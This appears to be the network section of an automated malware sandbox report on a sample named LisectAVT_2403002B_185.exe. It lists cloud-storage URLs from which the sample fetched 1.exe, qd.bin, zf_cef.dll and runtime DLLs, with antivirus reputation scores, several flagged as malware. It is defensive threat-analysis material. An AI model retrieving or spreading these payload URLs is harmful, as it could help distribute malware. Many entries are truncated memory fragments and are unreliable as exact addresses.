https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dlllp0%Avira URL Cloudsafe
http://ts-aia.ws.syma0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/100%Avira URL Cloudmalware
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/verse0%Avira URL Cloudsafe
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binw0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/?R0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exe0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll4100%Avira URL Cloudmalware
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/YmNhYj0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/;100%Avira URL Cloudmalware
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dlls0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exehf0%Avira URL Cloudsafe
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binC:0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exeXg0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dll0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dlltP0%Avira URL Cloudsafe
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binh0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllA0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dll0%Avira URL Cloudsafe
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.bing0%Avira URL Cloudsafe
https://aka.ms/winsvr-2022-pshelp0%Avira URL Cloudsafe
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binre.myqcloud.com0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dll0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll/kdll-1323571269.cos.ap-beijin100%Avira URL Cloudmalware
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/:0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllZ100%Avira URL Cloudmalware
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.bin0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dlldll0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllJ0%Avira URL Cloudsafe
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/)0%Avira URL Cloudsafe
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/X100%Avira URL Cloudmalware
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dllIONx_0%Avira URL Cloudsafe
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.bin;0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/Y100%Avira URL Cloudmalware
https://kdll-1323571269.cos.ap-beijing.myqcloud&u0%Avira URL Cloudsafe
https://github.com/Pester/Pester0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dlll100%Avira URL Cloudmalware
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllV0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dll0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/WITd0%Avira URL Cloudsafe
http://crl.mi0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlldlln0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllx100%Avira URL Cloudmalware
https://kdll-1323571269.cos.ap-beiji$W0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dlldllJ0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcls0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlldllx0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlldll0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dllhing0%Avira URL Cloudsafe
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll100%Avira URL Cloudmalware
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/w100%Avira URL Cloudmalware
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllx0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dlln0%Avira URL Cloudsafe
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/Q0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sgp.file.myqcloud.com
43.153.232.152
truefalse
    unknown
    bj.file.myqcloud.com
    82.156.94.45
    truefalse
      unknown
      leisuretrade-1323571269.cos.ap-beijing.myqcloud.com
      unknown
      unknowntrue
        unknown
        wwwqd-1323571269.cos.ap-singapore.myqcloud.com
        unknown
        unknowntrue
          unknown
          198.187.3.20.in-addr.arpa
          unknown
          unknowntrue
            unknown
            kdll-1323571269.cos.ap-beijing.myqcloud.com
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exefalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dllfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dllfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dllfalse
              • Avira URL Cloud: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllfalse
              • Avira URL Cloud: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllfalse
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dlllpLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409531560.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.microsoftLisectAVT_2403002B_185.exe, 00000000.00000003.1680040585.00000000077CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1679430145.00000000077CB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1678937786.00000000077C8000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1678744043.00000000077BB000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dlldll.LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/LicenseLisectAVT_2403002B_185.exe, 00000000.00000002.1714454232.0000000004895000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binwLisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://ts-aia.ws.symaLisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409518392.0000000000DA6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/mLisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/beijing.myqcloud.com/LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/?RLisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/verseLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll4LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://crl.thawte.com/ThawteTimestampingCA.crl0LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drfalse
              • URL Reputation: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binC:LisectAVT_2403002B_185.exefalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dlltPLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409531560.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/;LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exehfLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409531560.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1321968964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1319186272.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/YmNhYjLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/LisectAVT_2403002B_185.exe, 00000000.00000002.1714454232.0000000004895000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exeLisectAVT_2403002B_185.exe, 00000000.00000002.1714454232.0000000004895000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dllsLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409531560.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloudLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409531560.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exeXgLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409531560.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1321968964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1319186272.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binhLisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.bingLisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllALisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D40000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll/kdll-1323571269.cos.ap-beijinLisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://nuget.org/NuGet.exeLisectAVT_2403002B_185.exe, 00000000.00000002.1714454232.0000000004895000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://aka.ms/winsvr-2022-pshelpLisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binre.myqcloud.comLisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/:LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://pesterbdd.com/images/Pester.pngLisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/soap/encoding/LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllZLisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlLisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dlldllLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllJLisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://go.microLisectAVT_2403002B_185.exe, 00000000.00000003.1616355619.0000000003F75000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ocsp.thawte.com0LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcr120.dll.0.drfalse
              • URL Reputation: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dllIONx_LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/IconLisectAVT_2403002B_185.exe, 00000000.00000002.1714454232.0000000004895000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000CDE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/)LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.bin;LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/YLisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/XLisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud&uLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dlllLisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://github.com/Pester/PesterLisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beiji$WLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllVLisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.miLisectAVT_2403002B_185.exe, 00000000.00000003.1680040585.00000000077CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1716593820.00000000077D7000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1679430145.00000000077CB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1678937786.00000000077C8000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1678744043.00000000077BB000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlldllnLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/WITdLisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllxLisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://schemas.xmlsoap.org/wsdl/LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.00000000038F1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dlldllJLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlldllxLisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqclsLisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
